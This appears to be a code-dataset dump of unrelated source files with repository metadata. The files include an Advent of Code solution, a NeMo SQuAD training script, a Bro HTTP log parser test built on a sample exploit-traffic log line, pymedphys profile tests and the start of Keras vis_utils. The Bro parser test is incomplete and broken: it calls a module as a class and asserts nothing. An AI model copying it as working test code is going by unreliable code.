    decode = {pattern: digit for digit, pattern in segs.items()}
    digits = [decode[canon(o)] for o in outputs]
    return digits[0] * 1000 + digits[1] * 100 + digits[2] * 10 + digits[3]
print("-*-*-*-*-*-*-*-*-*-*-*-")
# Part 1: count output digits whose segment count is unique (1, 4, 7, 8).
print("Day 8 Part 1: " + str(sum(map(check_1478, list(itertools.chain(*list(map(split_signals,file))))))))
# Part 2: decode every line and sum its 4-digit output value.
print("Day 8 Part 2: " + str(sum(map(calculate_result, file))))
print("-*-*-*-*-*-*-*-*-*-*-*-") | 41.2 | 106 | 0.538835 |
acfb5456dabf5e0bdf1d679bdb0b210575124acb | 294 | py | Python | 110_extract_signatures-vanilla.py | stefanthaler/2017-fnlm-experiments-supervised | 813fd941900c6f3bd0943ec9856258421f71fcb6 | [
"Apache-2.0"
] | 4 | 2017-10-12T04:40:33.000Z | 2022-01-28T09:32:47.000Z | 110_extract_signatures-vanilla.py | stefanthaler/2017-fnlm-experiments-supervised | 813fd941900c6f3bd0943ec9856258421f71fcb6 | [
"Apache-2.0"
] | 1 | 2017-12-27T06:07:02.000Z | 2018-01-23T15:37:58.000Z | 110_extract_signatures-vanilla.py | stefanthaler/2017-fnlm-experiments-supervised | 813fd941900c6f3bd0943ec9856258421f71fcb6 | [
"Apache-2.0"
] | 2 | 2017-11-22T09:19:06.000Z | 2020-02-29T15:36:21.000Z | # -*- coding: utf-8 -*-
from c110.hyperparameters import *
variable_char = "º"
from approaches.signatures import extract_signatures_vanilla
extract_signatures_vanilla(test_logsfile_name,result_tags_filename,assigned_signatures_filename,found_signatures_filename,combined_signatures_filename)
| 42 | 151 | 0.863946 |
acfb54995e19b90bc6dbb9e385f84b21230cb799 | 164 | py | Python | Implementations/drygasconv1_python3/drysponge/drygascon128_aead.py | sebastien-riou/DryGASCON | 406b51914b4e8df752769feac48643c0fd1bd74b | [
"BSD-3-Clause"
] | 2 | 2019-11-11T08:12:16.000Z | 2021-04-13T07:00:53.000Z | Implementations/drygasconv1_python3/drysponge/drygascon128_aead.py | sebastien-riou/DryGASCON | 406b51914b4e8df752769feac48643c0fd1bd74b | [
"BSD-3-Clause"
] | null | null | null | Implementations/drygasconv1_python3/drysponge/drygascon128_aead.py | sebastien-riou/DryGASCON | 406b51914b4e8df752769feac48643c0fd1bd74b | [
"BSD-3-Clause"
] | 1 | 2019-08-10T13:26:11.000Z | 2019-08-10T13:26:11.000Z | from drysponge.drygascon import DryGascon
from drysponge.aead import aead
if __name__ == "__main__":
    # Exercise the DryGASCON128 AEAD implementation through the generic harness.
    impl = DryGascon.DryGascon128().instance()
    aead(impl)
| 23.428571 | 46 | 0.75 |
acfb5553927e7d1828dd295db9cb6590e20120f7 | 5,770 | py | Python | examples/nlp/question_answering/question_answering_squad.py | vadam5/NeMo | 3c5db09539293c3c19a6bb7437011f91261119af | [
"Apache-2.0"
] | 1 | 2021-04-13T20:34:16.000Z | 2021-04-13T20:34:16.000Z | examples/nlp/question_answering/question_answering_squad.py | vadam5/NeMo | 3c5db09539293c3c19a6bb7437011f91261119af | [
"Apache-2.0"
] | null | null | null | examples/nlp/question_answering/question_answering_squad.py | vadam5/NeMo | 3c5db09539293c3c19a6bb7437011f91261119af | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This script contains an example on how to train, evaluate and perform inference with the question answering model.
The QAModel in NeMo supports extractive question answering problems for data in the SQuAD (https://rajpurkar.github.io/SQuAD-explorer/) format.
***Data format***
The QAModel requires a JSON file for each dataset split.
In the following we will show example for a training file. Each title has one or multiple paragraph entries, each consisting of the text - "context", and question-answer entries. Each question-answer entry has:
* a question
* a globally unique id
* a boolean flag "is_impossible" which shows if the question is answerable or not
* in case the question is answerable one answer entry, which contains the text span and its starting character index in the context. If not answerable, the "answers" list is empty
The evaluation file follows the above format except for it can provide more than one answers to the same question.
The inference file follows the above format except for it does not require the "answers" and "is_impossible" keywords.
***Downloading the dataset***
Run ./NeMo/examples/nlp/question_answering/get_squad.py to download the SQuAD dataset:
# python get_squad.py --destDir=<PATH_TO_DATA>
***Setting the configs***
The model and the PT trainer are defined in a config file which declares multiple important sections.
The most important ones are:
model: All arguments that are related to the Model - language model, tokenizer, token classifier, optimizer,
schedulers, and datasets/data loaders.
trainer: Any argument to be passed to PyTorch Lightning including number of epochs, number of GPUs,
precision level, etc.
This script uses the `/examples/nlp/question_answering/conf/question_answering_squad_config.yaml` config file
by default. You may update the config file from the file directly. The other option is to set another config file via command line arguments by `--config-name=CONFIG_FILE_PATH'.
***Model Training***
# python question_answering_squad.py
model.train_ds.file=<TRAIN_JSON_FILE>
model.validation_ds=<VAL_JSON_FILE>
trainer.max_epochs=<NUM_EPOCHS>
trainer.gpus=[<CHANGE_TO_GPU_YOU_WANT_TO_USE>]
***Model Evaluation***
Set `do_training=False` in the script and run:
# python question_answering_squad.py
model.test_file=<TEST_JSON_FILE>
To load a pretrained checkpoint from cloud prior to training (e.g. for fine-tuning) or evaluation you can set cfg.from_pretrained=<MODEL_NAME>,
e.g. MODEL_NAME='BERTBaseUncasedSQuADv1.1'. You can find all pretrained model names by using
QAModel.list_available_models(). To load a local checkpoint use qa_model.restore_from(<PATH_TO_CHECKPOINT>)
***Model Inference***
For inference use
qa_model.inference(
file=<INFERENCE_JSON_FILE>,
batch_size=<BATCH_SIZE>,
output_nbest_file=<OPTIONAL_OUTPUT_FILE_FOR_NBEST_LIST>,
output_prediction_file=<OPTIONAL_OUTPUT_FILE_FOR_PREDICTION>
)
More details on how to use this script can be found in
./NeMo/tutorials/nlp/Question_Answering_Squad.ipynb
"""
import os
import pytorch_lightning as pl
from omegaconf import DictConfig, OmegaConf
from nemo.collections.nlp.models.question_answering.qa_model import QAModel
from nemo.core.config import hydra_runner
from nemo.utils import logging
from nemo.utils.exp_manager import exp_manager
@hydra_runner(config_path="conf", config_name="question_answering_squad_config")
def main(cfg: DictConfig) -> None:
logging.info(f'Config: {cfg.pretty()}')
trainer = pl.Trainer(**cfg.trainer)
exp_dir = exp_manager(trainer, cfg.get("exp_manager", None))
if not cfg.pretrained_model:
logging.info(f'Config: {OmegaConf.to_yaml(cfg)}')
model = QAModel(cfg.model, trainer=trainer)
else:
logging.info(f'Loading pretrained model {cfg.pretrained_model}')
model = QAModel.from_pretrained(cfg.pretrained_model)
if cfg.do_training:
model.setup_training_data(train_data_config=cfg.model.train_ds)
model.setup_validation_data(val_data_config=cfg.model.validation_ds)
if cfg.do_training:
trainer.fit(model)
if cfg.model.nemo_path:
model.save_to(cfg.model.nemo_path)
if hasattr(cfg.model, 'test_ds') and cfg.model.test_ds.file is not None:
trainer.test(model)
# change to path if you want results to be written to file e.g. os.path.join(exp_dir, "output_nbest_file.txt")
output_nbest_file = None
# change to path if you want results to be written to file e.g. os.path.join(exp_dir, "output_prediction_file.txt")
output_prediction_file = None
inference_samples = 5 # for test purposes. To use entire inference dataset set to -1
all_preds, all_nbests = model.inference(
file=cfg.model.validation_ds.file,
batch_size=1,
num_samples=inference_samples,
output_nbest_file=output_nbest_file,
output_prediction_file=output_prediction_file,
)
for _, item in all_preds.items():
print(f"question: {item[0]} answer: {item[1]}")
if __name__ == '__main__':
main()
| 42.740741 | 210 | 0.752686 |
acfb570294f296e674721ddfa712c945e190ea5e | 4,173 | py | Python | python/parserDev/test_BroHttpPyParser.py | jzadeh/aktaion | 485488908e88212e615cd8bde04c6b1b63403cd0 | [
"Apache-2.0"
] | 112 | 2017-07-26T00:30:29.000Z | 2021-11-09T14:02:12.000Z | python/parserDev/test_BroHttpPyParser.py | jzadeh/aktaion | 485488908e88212e615cd8bde04c6b1b63403cd0 | [
"Apache-2.0"
] | null | null | null | python/parserDev/test_BroHttpPyParser.py | jzadeh/aktaion | 485488908e88212e615cd8bde04c6b1b63403cd0 | [
"Apache-2.0"
] | 38 | 2017-07-28T03:09:01.000Z | 2021-05-07T03:21:32.000Z | import BroHttpPyParser
import ParsingNormalizationPyLogic
import unittest
import os
import inspect
#the scala test unit defines the following tests:
#1)Basic Bro Normalized Parser
#intakes a raw log line
#parser the raw log line through BroHttpParser
#Feed the parsed line through normalizedBroLog
#checks host, id_orig_host, and sourceIP attributes
#2)Basic Bro HTTP parser
#intake a raw log line
#checks host, id_orig_host, and sourceIP attributes
#3)Bro HTTP file
#intake a log file (/parser.bro/citadelsample/http.log)
#checks no error is thrown by calling a file an
#make example log data file path relative to the project
directory = os.path.dirname(os.path.abspath(inspect.stack()[0][1]))
filename = os.path.join(directory, '../../data/broData/ExploitExample/http.log')
exceptionFile = os.path.join(directory, '../../testdata/badBroLog.log')
#this is to deal with the log file length exceeding the TestCase allowable length
unittest.TestCase.maxDiff = None
class BroParserTests(unittest.TestCase):
knownValues = ( (filename
,{'host': 'graphicstreeme.com', 'method': 'GET', 'idOrigPort': 49161, 'password': '-', 'uri': '/wp-content/plugins/theme-check/misc.php?572A56481F78D91A71F483FAC3626A6F89E2D4AFC98B8E4D38D901CB11D6B924D13EDDCA9E1C27D91D71987B1051AD6B2F9BEA566F4F3045C43796BFEC4C8AF763F838783B32EE6F30599814D4C07EDA1CB04100BE5491A459ED2919E1E7F57FFBF78B983B91D398700387E8A31738D900E2E32075CF665A12BD8AD4718F7B32F695E398862E28B15DE8A44AA7A63AF0648C44373229C87CD8566B3E64F4677A1B79C1DB1C9D9AB52836A8230F62BBCB144F4B8CA8A44BAAC4D35497A512995BC1865425D0F0C5E4380181F73DE7690B7680D4FA05D2A419B66DA62943BDF7276B100B5DC2B1F39D53847F3768053ED3C273A328CEF9BEBBC84D28FDEAB69E114D3DF889E54074029D8232027596623990647E1D01D1D402657382B1F51D05F5B272ED3C7615A7D0CD647F85F1FA10E55F7F1749565525526D227D5941A9867E59E45879712590AACA4336088056A91FF3A3129B1384811DE40F749EB09896F91704F83CB5A347EBE4D3B5D2D45851DF', 'info_code': '-', 'info_msg': '-', 'requestBodyLen': 0, 'trans_depth': 2, 'id.orig_p': 49161, 'resp_fuids': 'FWdp4h4pEuJOLZrJA9', 'statusCode': 'OK', 'resp_mime_types': 'text/plain', 'username': '-', 'ts': 1450372321.641135, 'epochTime': 1450372321.641135, 'referrer': '-', 'idRespPort': 80, 'request_body_len': 0, 'id.orig_h': '172.16.25.128', 'orig_mime_types': '-', 'orig_fuids': '-', 'id.resp_h': '182.50.130.156', 'idOrigHost': '172.16.25.128', 'status_msg': 'OK', 'user_agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko', 'status_code': 200, 'filename': '-', 'transDepth': 2, 'responseBodyLen': 25, 'uid': 'CCZDtw19H01FglVpy1', 'id.resp_p': 80, 'tags': '(empty)', 'userAgent': 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko', 'fullUrl': 
'https:\\graphicstreeme.com/wp-content/plugins/theme-check/misc.php?572A56481F78D91A71F483FAC3626A6F89E2D4AFC98B8E4D38D901CB11D6B924D13EDDCA9E1C27D91D71987B1051AD6B2F9BEA566F4F3045C43796BFEC4C8AF763F838783B32EE6F30599814D4C07EDA1CB04100BE5491A459ED2919E1E7F57FFBF78B983B91D398700387E8A31738D900E2E32075CF665A12BD8AD4718F7B32F695E398862E28B15DE8A44AA7A63AF0648C44373229C87CD8566B3E64F4677A1B79C1DB1C9D9AB52836A8230F62BBCB144F4B8CA8A44BAAC4D35497A512995BC1865425D0F0C5E4380181F73DE7690B7680D4FA05D2A419B66DA62943BDF7276B100B5DC2B1F39D53847F3768053ED3C273A328CEF9BEBBC84D28FDEAB69E114D3DF889E54074029D8232027596623990647E1D01D1D402657382B1F51D05F5B272ED3C7615A7D0CD647F85F1FA10E55F7F1749565525526D227D5941A9867E59E45879712590AACA4336088056A91FF3A3129B1384811DE40F749EB09896F91704F83CB5A347EBE4D3B5D2D45851DF', 'response_body_len': 25, 'idRespHost': '182.50.130.156', 'proxied': '-'}
),
)
rawLogLine = "1407536946.250769 CuXBEZ1N3EwxNX5Frl 192.168.57.105 44688 192.168.57.110 80 1 POST citadel.com /file.php - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C) 122 5280 200 OK - - - (empty) - - - FZrQg1NzTvumR5iG - FsWWXv2NaAihisYjY -"
def test_basicBroNormalizedParser(self):
normData = ParsingNormalizationPyLogic() | 99.357143 | 2,585 | 0.798706 |
acfb5740e9b1d01242955fabb8273e34bc013293 | 11,116 | py | Python | tests/labs/paulking/test_profile.py | pymedphys/pymedphys-archive-2019 | 6bb7c8d0da2e93ff56469bb47e65b15ece2ea25e | [
"Apache-2.0"
] | 1 | 2020-12-20T14:13:56.000Z | 2020-12-20T14:13:56.000Z | tests/labs/paulking/test_profile.py | pymedphys/pymedphys-archive-2019 | 6bb7c8d0da2e93ff56469bb47e65b15ece2ea25e | [
"Apache-2.0"
] | null | null | null | tests/labs/paulking/test_profile.py | pymedphys/pymedphys-archive-2019 | 6bb7c8d0da2e93ff56469bb47e65b15ece2ea25e | [
"Apache-2.0"
] | 1 | 2020-12-20T14:14:00.000Z | 2020-12-20T14:14:00.000Z | # Copyright (C) 2019 Paul King, Simon Biggs
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# The following needs to be removed before leaving labs
# pylint: skip-file
""" Test profile. """
import os
import numpy as np
from pymedphys._data import download
from pymedphys.labs.paulking.profile import Profile
PROFILER = [
(-16.4, 0.22),
(-16, 0.3),
(-15.6, 0.28),
(-15.2, 0.3),
(-14.8, 0.36),
(-14.4, 0.38),
(-14, 0.41),
(-13.6, 0.45),
(-13.2, 0.47),
(-12.8, 0.51),
(-12.4, 0.55),
(-12, 0.62),
(-11.6, 0.67),
(-11.2, 0.74),
(-10.8, 0.81),
(-10.4, 0.91),
(-10, 0.97),
(-9.6, 1.12),
(-9.2, 1.24),
(-8.8, 1.4),
(-8.4, 1.56),
(-8, 1.75),
(-7.6, 2.06),
(-7.2, 2.31),
(-6.8, 2.56),
(-6.4, 3.14),
(-6, 3.83),
(-5.6, 4.98),
(-5.2, 8.17),
(-4.8, 40.6),
(-4.4, 43.34),
(-4, 44.17),
(-3.6, 44.44),
(-3.2, 44.96),
(-2.8, 44.18),
(-2.4, 45.16),
(-2, 45.54),
(-1.6, 45.07),
(-1.2, 45.28),
(-0.8, 45.27),
(-0.4, 44.57),
(0, 45.23),
(0.4, 45.19),
(0.8, 45.18),
(1.2, 45.37),
(1.6, 45.34),
(2, 45.39),
(2.4, 45.32),
(2.8, 45.25),
(3.2, 44.84),
(3.6, 44.76),
(4, 44.23),
(4.4, 43.22),
(4.8, 39.14),
(5.2, 7.98),
(5.6, 4.89),
(6, 3.71),
(6.4, 3.11),
(6.8, 2.59),
(7.2, 2.27),
(7.6, 1.95),
(8, 1.71),
(8.4, 1.46),
(8.8, 1.35),
(9.2, 1.18),
(9.6, 1.11),
(10, 0.93),
(10.4, 0.87),
(10.8, 0.78),
(11.2, 0.7),
(11.6, 0.64),
(12, 0.6),
(12.4, 0.54),
(12.8, 0.49),
(13.2, 0.47),
(13.6, 0.43),
(14, 0.4),
(14.4, 0.39),
(14.8, 0.34),
(15.2, 0.33),
(15.6, 0.32),
(16, 0.3),
(16.4, 0.3),
]
WEDGED = [
(-16.4, 0.27),
(-16, 0.31),
(-15.6, 0.29),
(-15.2, 0.29),
(-14.8, 0.32),
(-14.4, 0.33),
(-14, 0.35),
(-13.6, 0.38),
(-13.2, 0.4),
(-12.8, 0.44),
(-12.4, 0.46),
(-12, 0.51),
(-11.6, 0.55),
(-11.2, 0.6),
(-10.8, 0.65),
(-10.4, 0.7),
(-10, 0.74),
(-9.6, 0.84),
(-9.2, 0.94),
(-8.8, 1.04),
(-8.4, 1.14),
(-8, 1.25),
(-7.6, 1.45),
(-7.2, 1.6),
(-6.8, 1.78),
(-6.4, 2.14),
(-6, 2.66),
(-5.6, 3.62),
(-5.2, 6.54),
(-4.8, 17.55),
(-4.4, 20.07),
(-4, 21.37),
(-3.6, 22.19),
(-3.2, 23.1),
(-2.8, 23.74),
(-2.4, 24.56),
(-2, 25.49),
(-1.6, 26.35),
(-1.2, 27),
(-0.8, 28.06),
(-0.4, 28.89),
(0, 29.8),
(0.4, 30.61),
(0.8, 31.4),
(1.2, 32.53),
(1.6, 33.06),
(2, 34.15),
(2.4, 34.85),
(2.8, 35.65),
(3.2, 36.6),
(3.6, 37.04),
(4, 37.45),
(4.4, 36.72),
(4.8, 30.93),
(5.2, 10.06),
(5.6, 5.43),
(6, 3.71),
(6.4, 3.01),
(6.8, 2.52),
(7.2, 2.19),
(7.6, 1.9),
(8, 1.7),
(8.4, 1.48),
(8.8, 1.35),
(9.2, 1.19),
(9.6, 1.09),
(10, 0.93),
(10.4, 0.89),
(10.8, 0.78),
(11.2, 0.72),
(11.6, 0.65),
(12, 0.6),
(12.4, 0.55),
(12.8, 0.5),
(13.2, 0.48),
(13.6, 0.45),
(14, 0.41),
(14.4, 0.4),
(14.8, 0.35),
(15.2, 0.33),
(15.6, 0.32),
(16, 0.31),
(16.4, 0.3),
]
def get_data_file(filename):
    """Resolve *filename* inside the bundled pymedphys test-data zip."""
    zip_name = "paulking_test_data.zip"
    return download.get_file_within_data_zip(zip_name, filename)
def test_init():
    """A single-point profile keeps the x value it was built with."""
    single_point = Profile(x=[0], y=[0])
    assert np.allclose(single_point.x, [0])
def test_interp():
    """interp is None when empty, and linear between two points."""
    assert Profile().interp is None
    two_points = Profile(x=[0, 1], y=[0, 1])
    assert np.isclose(two_points.interp(0.5), 0.5)
def test_magic_methods():
    """Exercise the dunder protocol of Profile (len, eq, copy, str, arithmetic)."""
    assert not Profile()
    # __len__
    assert len(Profile().from_tuples(PROFILER)) == 83
    # __eq__
    assert Profile() == Profile()
    assert Profile(x=[], y=[]) == Profile()
    assert Profile(x=[0], y=[0]) != Profile()
    # __copy__ -- previously this aliased (`same = original`), which made the
    # equality assertion trivially true; use an actual shallow copy instead.
    from copy import copy
    original = Profile()
    duplicate = copy(original)
    assert duplicate == original
    assert duplicate is not original
    # __str__
    empty_profile = Profile()
    print(empty_profile)
    profiler = Profile().from_tuples(PROFILER)
    assert profiler.__str__()
    # __add__, __radd__, __iadd__ -- adding shifts the x axis
    profiler = Profile().from_tuples(PROFILER)
    assert np.isclose(profiler.get_y(0), (profiler + 2).get_y(2))
    # __sub__, __rsub__, __isub__
    profiler = Profile().from_tuples(PROFILER)
    assert np.isclose(profiler.get_y(0), (profiler - 2).get_y(-2))
    # __mul__, __rmul__, __imul__ -- multiplying scales the y values
    profiler = Profile().from_tuples(PROFILER)
    assert np.isclose(4 * sum(profiler.y), sum((4 * profiler).y))
    assert np.isclose(4 * sum(profiler.y), sum((profiler * 4).y))
    ref = 4 * sum(profiler.y)
    profiler *= 4
    assert np.isclose(sum(profiler.y), ref)
def test_from_lists():
    """Loading empty x/y lists should leave an empty profile unchanged."""
    empty = Profile()
    # NOTE(review): `also_empty` is the *same object* as `empty`, so the final
    # equality assert is trivially true regardless of what from_lists() does.
    # Consider comparing against a fresh Profile() instead.
    also_empty = empty
    also_empty.from_lists([], [])
    assert empty == also_empty
def test_from_tuples():
    """from_tuples keeps every point and preserves the first abscissa."""
    loaded = Profile().from_tuples(PROFILER)
    expected_first_x = PROFILER[0][0]
    assert len(loaded.x) == len(PROFILER)
    assert loaded.x[0] == expected_first_x
def test_from_pulse():
    """Scaling a unit pulse by 4 scales the integrated signal to 40."""
    unit_pulse = Profile().from_pulse(0.0, 1, (-5, 5), 0.1)
    scaled = 4 * unit_pulse
    assert np.isclose(sum(scaled.y), 40)
def test_from_snc_profiler():
    """Both axes read from one SNC .prs file agree at x=0 and share metadata."""
    file_name = get_data_file("test_varian_open.prs")
    # "tvs" / "rad" select the two measurement axes of the Profiler file.
    x_profile = Profile().from_snc_profiler(file_name, "tvs")
    y_profile = Profile().from_snc_profiler(file_name, "rad")
    assert np.isclose(x_profile.get_y(0), 45.50562901780488)
    assert np.isclose(y_profile.get_y(0), 45.50562901780488)
    assert x_profile.meta["SSD"] == y_profile.meta["SSD"]
def test_from_narrow_png():
    """A narrow film-strip PNG loads with the expected central value."""
    strip_path = get_data_file("FilmCalib_EBT_vert_strip.png")
    strip = Profile().from_narrow_png(strip_path)
    assert np.isclose(strip.get_y(0), 0.609074819347117)
def test_get_y():
    """get_y(0) returns the central reading of the profiler scan."""
    scan = Profile().from_tuples(PROFILER)
    central_value = scan.get_y(0)
    assert np.isclose(central_value, 45.23)
def test_get_x():
    """get_x(10) returns both crossing positions at the value 10."""
    scan = Profile().from_tuples(PROFILER)
    expected_crossings = (-5.17742830712, 5.1740693196)
    assert np.allclose(scan.get_x(10), expected_crossings)
def test_get_increment():
    """The profiler data is sampled on a uniform 0.4 grid."""
    scan = Profile().from_tuples(PROFILER)
    assert np.isclose(scan.get_increment(), 0.4)
def test_slice_segment():
    """slice_segment handles empty, single-point and full-range slices."""
    scan = Profile().from_tuples(PROFILER)
    # start > stop selects nothing
    empty_slice = scan.slice_segment(start=1, stop=0)
    assert np.array_equal(empty_slice.x, [])
    assert np.array_equal(empty_slice.y, [])
    # start == stop selects exactly one point
    scan = Profile().from_tuples(PROFILER)
    single = scan.slice_segment(start=0, stop=0)
    assert np.array_equal(single.x, [0])
    assert np.array_equal(single.y, [45.23])
    # default bounds keep every point
    scan = Profile().from_tuples(PROFILER)
    everything = scan.slice_segment()
    assert np.array_equal(everything.x, scan.x)
    assert np.array_equal(everything.y, scan.y)
def test_resample_x():
    """Resampling on a 0.1 grid preserves values, metadata and endpoints."""
    scan = Profile().from_tuples(PROFILER, meta={"depth": 10})
    assert scan.meta["depth"] == 10
    assert np.isclose(scan.interp(0), scan.resample_x(0.1).interp(0))
    assert np.isclose(scan.interp(6.372), scan.resample_x(0.1).interp(6.372))
    regridded = scan.resample_x(0.1)
    step_sizes = np.diff(list(regridded.x))
    assert np.allclose(step_sizes, 0.1)
    assert np.isclose(regridded.y[0], scan.y[0])
def test_resample_y():
    """A finer y step yields more sample points than a coarser one."""
    scan = Profile().from_tuples(PROFILER)
    fine = scan.resample_y(0.5)
    coarse = scan.resample_y(1)
    assert len(fine) > len(coarse)
def test_make_normal_y():
    """Normalising at x=0 forces the value there to 1.0."""
    scan = Profile().from_tuples(PROFILER)
    normalised = scan.make_normal_y(x=0)
    assert np.isclose(normalised.get_y(0), 1.0)
def test_get_edges():
    """Edges of the profiler scan are found without losing any points."""
    scan = Profile().from_tuples(PROFILER)
    assert np.allclose(scan.get_edges(), (-5.2, 4.8))
    assert len(scan) == len(PROFILER)
def test_make_normal_x():
    """make_normal_x rescales x without changing the point count."""
    scan = Profile().from_tuples(PROFILER)
    assert np.isclose(scan.make_normal_x().x[0], -3.1538461538461533)
    # A fresh scan is used for the second check, as in the original test.
    fresh_scan = Profile().from_tuples(PROFILER)
    assert len(fresh_scan.make_normal_x().x) == len(PROFILER)
def test_slice_umbra():
    """The umbra is a strict sub-section of the full scan."""
    scan = Profile().from_tuples(PROFILER).resample_x(0.1)
    full_length = len(scan)
    umbra = scan.slice_umbra()
    assert len(umbra) < full_length
def test_slice_penumbra():
    """Penumbrae lie on either side of centre, below the central value."""
    scan = Profile().from_tuples(PROFILER).resample_x(0.1)
    left, right = scan.slice_penumbra()
    assert np.all(left.x < 0)
    assert np.all(right.x > 0)
    assert np.all(left.y < scan.get_y(0))
    assert np.all(right.y < scan.get_y(0))
def test_slice_shoulders():
    """The two shoulder slices do not overlap in x."""
    scan = Profile().from_tuples(PROFILER).resample_x(0.1)
    left_shoulder, right_shoulder = scan.slice_shoulders()
    assert np.all(left_shoulder.x < min(right_shoulder.x))
    assert np.all(right_shoulder.x > max(left_shoulder.x))
def test_slice_tails():
    """The two tail slices do not overlap in x."""
    scan = Profile().from_tuples(PROFILER).resample_x(0.1)
    left_tail, right_tail = scan.slice_tails()
    assert np.all(left_tail.x < min(right_tail.x))
    assert np.all(right_tail.x > max(left_tail.x))
def test_get_flatness():
    """Flatness of the resampled profiler scan matches the known value."""
    resampled = Profile().from_tuples(PROFILER).resample_x(0.1)
    assert np.isclose(resampled.get_flatness(), 0.03042644213284108)
def test_get_symmetry():
    """Symmetry of the resampled profiler scan matches the known value."""
    resampled = Profile().from_tuples(PROFILER).resample_x(0.1)
    assert np.isclose(resampled.get_symmetry(), 0.024152376510553037)
def test_make_symmetric():
    """A symmetrised profile reports zero symmetry error."""
    scan = Profile().from_tuples(PROFILER)
    assert np.isclose(scan.make_symmetric().get_symmetry(), 0.0)
def test_make_centered():
    """After centring, the two edges are equidistant from zero."""
    scan = Profile().from_tuples(PROFILER)
    edge_sum = np.sum(scan.make_centered().get_edges())
    assert np.isclose(edge_sum, 0.0)
def test_make_flipped():
    """Flipping mirrors the profile about x=0."""
    scan = Profile().from_tuples(PROFILER)
    # Single expression keeps the original left-to-right evaluation order.
    assert np.isclose(scan.get_y(3), scan.make_flipped().get_y(-3))
def test_align_to():
    """Aligning to a copy shifted by +2 shifts the x values by +2."""
    scan = Profile().from_tuples(PROFILER)
    assert np.isclose(scan.align_to(scan + 2).x[0], scan.x[0] + 2)
def test_cross_calibrate():
    """The film calibration curve covers (at least part of) [0, 1]."""
    reference = get_data_file("FilmCalib.prs")
    measured = get_data_file("FilmCalib_EBT_vert_strip.png")
    curve = Profile().cross_calibrate(reference, measured)
    assert min(curve.x) <= 1
    assert max(curve.x) >= 0
| 26.529833 | 86 | 0.572058 |
acfb576a9916634d62edf7a1256c2a1ee7e87576 | 1,173 | py | Python | ava/common/migrations/0003_auto_20180504_0511.py | patrickporto/elearning | b746fcfa5dadc77eaa0b3e20ff006f386b9dae67 | [
"MIT"
] | null | null | null | ava/common/migrations/0003_auto_20180504_0511.py | patrickporto/elearning | b746fcfa5dadc77eaa0b3e20ff006f386b9dae67 | [
"MIT"
] | null | null | null | ava/common/migrations/0003_auto_20180504_0511.py | patrickporto/elearning | b746fcfa5dadc77eaa0b3e20ff006f386b9dae67 | [
"MIT"
] | null | null | null | # Generated by Django 2.0.5 on 2018-05-04 05:11
import common.models
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated schema migration (2018-05-04).

    Sets the custom ``UserManager`` on ``usuario`` and alters three fields:
    ``turma.professor`` is limited to users with ``papel == 1``,
    ``usuario.foto`` gains a default avatar URL, and ``usuario.papel``
    becomes an integer choice field defaulting to 0 (Admin).
    """
    # Must be applied after the previous migration of the `common` app.
    dependencies = [
        ('common', '0002_auto_20180504_0458'),
    ]
    operations = [
        migrations.AlterModelManagers(
            name='usuario',
            managers=[
                ('objects', common.models.UserManager()),
            ],
        ),
        migrations.AlterField(
            model_name='turma',
            name='professor',
            # limit_choices_to restricts the FK to 'Professor' users (papel == 1).
            field=models.ForeignKey(limit_choices_to={'papel': 1}, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
        migrations.AlterField(
            model_name='usuario',
            name='foto',
            field=models.ImageField(default='https://api.adorable.io/avatars/192/abott@adorable.png', upload_to='avatars/'),
        ),
        migrations.AlterField(
            model_name='usuario',
            name='papel',
            field=models.IntegerField(choices=[(1, 'Professor'), (2, 'Aluno'), (0, 'Admin')], default=0),
        ),
    ]
| 30.868421 | 141 | 0.59335 |
acfb589f51b5ead619bc8bfc086a4764d73c111c | 12,680 | py | Python | tensorflow/python/keras/utils/vis_utils.py | jonah-kohn/tensorflow | 8f278b5c183b485f038b0504308929b4e3bde5a7 | [
"Apache-2.0"
] | null | null | null | tensorflow/python/keras/utils/vis_utils.py | jonah-kohn/tensorflow | 8f278b5c183b485f038b0504308929b4e3bde5a7 | [
"Apache-2.0"
] | null | null | null | tensorflow/python/keras/utils/vis_utils.py | jonah-kohn/tensorflow | 8f278b5c183b485f038b0504308929b4e3bde5a7 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=protected-access
# pylint: disable=g-import-not-at-top
"""Utilities related to model visualization."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
from tensorflow.python.keras.utils.io_utils import path_to_string
from tensorflow.python.util import nest
from tensorflow.python.util.tf_export import keras_export
try:
# pydot-ng is a fork of pydot that is better maintained.
import pydot_ng as pydot
except ImportError:
# pydotplus is an improved version of pydot
try:
import pydotplus as pydot
except ImportError:
# Fall back on pydot if necessary.
try:
import pydot
except ImportError:
pydot = None
def check_pydot():
